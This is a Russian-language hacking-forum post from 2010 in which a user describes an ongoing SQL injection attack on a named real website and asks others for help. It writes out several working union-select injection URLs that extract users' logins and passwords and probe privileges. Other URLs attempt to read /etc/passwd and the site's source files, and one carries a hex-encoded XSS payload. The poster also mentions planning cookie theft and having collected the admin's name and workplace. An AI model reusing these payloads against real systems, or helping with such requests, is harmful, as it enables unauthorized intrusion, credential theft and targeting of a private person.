Тема: Ваши вопросы по уязвимостям.
Показать сообщение отдельно

  #3  
Старый 09.03.2010, 02:43
overcrookd
Новичок
Регистрация: 08.03.2010
Сообщений: 5
Провел на форуме:
8681

Репутация: 0
По умолчанию
Здрасти!
Возникла проблема которую не могу решить даже после прочтения етого треда,множества FAQ по sql inj, sql cheat sheet'ов, мануалов, статей в Хакере и всего подобного.
Вообщем дело обстоит так:
inj:

http://enjoy.md/category.php?id=2%27] http://enjoy.md/category.php?id=2'


Доступ к БД осуществил, вытянуть удалось лишь логины и пассы пользователей сайта, найти логин и пасс админа в этой БД не удалось. В user_privileges - privilege_type-usage и is_grantable-no:

http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,grantee,privilege_type ,is_grantable%29+from+information_schema.user_priv ileges--


load_file выдает пустую страницу(что в hex, что в текст, что с aes_decrypt(aes_encrypt)):

http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27etc/passwd%27%29,3--+
http://enjoy.md/category.php?id=-6/**/union/**/select+1,load_file%28%27home/vhosts/enjoy.md/public_html/index.php%27%29,3--+


инфа:
version() - 5.1.37 mysql
user()- '20121'@'localhost'
database() - 20121_enjoy
ещё нашел адмику:
http://enjoy.md/admin/
и PMA:
http://enjoy.md/phpmyadmin

что интересно, вовсяком случае мне так показалось, так ето вот:

http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,table_schema+from+information_schema.tables+wh ere+table_name=%27admin%27--

Не могу понять откуда эти БД взялись если при таком запросе их не видно:

http://enjoy.md/category.php?id=-2/**/union/**/select/**/1,2,schema_name+from+information_schema.schemata--

Подключитьсяк ним никак не могу,есть ли способ и гдеж логин и пасс админа хранится тогда? в PMA и админке обойти авторизацию не вышло.
Помогите додумать это плз, может совет какой дадите.
На данный момент приходит в голову лишь кража кукисов, на сайте есть мыло и icq, с их помощью узнал ФИО админа,место работы, сделанные им сайты. Не приятно признавать но не охото мне с кукисами морочиться если есть другие варьянты дайте знать
SiXSS(alert):

http://enjoy.md/category.php?id=-2/**/union/**/select+1,2,0x3c7363726970743e616c657274282256756c6 e65726162696c69747922293b3c2f7363726970743e%20--

Это может выглядить глупо но всё же:

http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+

значит всё же file_priv=Y? если я чёт намудрил плз исправьте
доступа к file_priv непсредственно из mysql.users нету,даёт ошибку, как впрочем и к самой БД mysql:
http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,file_priv+from+mysql.users--

еще вопрос, почему пишет privilege_type-select is_grantable-no? Я же вовсю им орудую. Или это отнсится лишь к БД и их выбору?

http://enjoy.md/category.php?id=-6/**/union/**/select+1,2,concat_ws%280x3a,privilege_type,is_gran table%29+from+information_schema.schema_privileges--

надеюсь я ниче не перепутал спс!
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php
т.к. в моём случае заливка шелла не возможна по всей видимость просто прошу обьяснить какой именно путь указать при load_file
 
Ответить с цитированием